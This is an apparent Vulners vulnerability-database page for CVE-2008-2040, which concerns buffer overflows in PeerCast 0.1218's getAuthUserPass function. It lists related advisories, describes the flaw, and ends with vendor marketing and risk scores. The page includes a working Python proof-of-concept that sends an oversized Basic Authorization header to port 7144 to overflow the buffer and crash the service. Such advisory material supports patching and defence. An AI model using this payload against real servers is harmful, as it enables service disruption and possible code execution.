PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| peercast -- arbitrary code execution | 20 May 200800:00 | – | freebsd | |
| Vulnerabilities in the Debian GNU/Linux operating system that allow a remote attacker to compromise the confidentiality, integrity, and accessibility of protected information | 28 Apr 201500:00 | – | bdu_fstec | |
| CVE-2008-2040 | 29 Apr 200800:00 | – | circl | |
| CVE-2008-2040 | 30 Apr 200815:00 | – | cve | |
| CVE-2008-2040 | 30 Apr 200815:00 | – | cvelist | |
| [SECURITY] [DSA 1582-1] New peercast packages fix arbitrary code execution | 20 May 200817:32 | – | debian | |
| [SECURITY] [DSA 1583-1] New gnome-peercast packages fix several vulnerabilities | 20 May 200817:32 | – | debian | |
| Debian DSA-1582-1 : peercast - buffer overflow | 22 May 200800:00 | – | nessus | |
| Debian DSA-1583-1 : gnome-peercast - buffer overflow | 22 May 200800:00 | – | nessus | |
| FreeBSD : peercast -- arbitrary code execution (402ae710-26a2-11dd-ae05-825f4c35000a) | 14 Oct 201100:00 | – | nessus |
10
source: https://www.securityfocus.com/bid/28986/info
PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
Successfully exploiting these issues will allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
These issues affect PeerCast 0.1218; other versions may also be affected.
#!/usr/bin/env python
import sys, socket
port = 7144
buff = 'GET /http/ HTTP/1.1\n'
buff+= 'Connection: close\n'
buff+= 'Accept: */*\n'
buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'
if(len(sys.argv) < 2):
print "ERR: please specify a hostname"
sys.exit(-1)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], port))
s.send(buff);
except:
print "ERR: socket()"
sys.exit(-1)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Feb 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.14863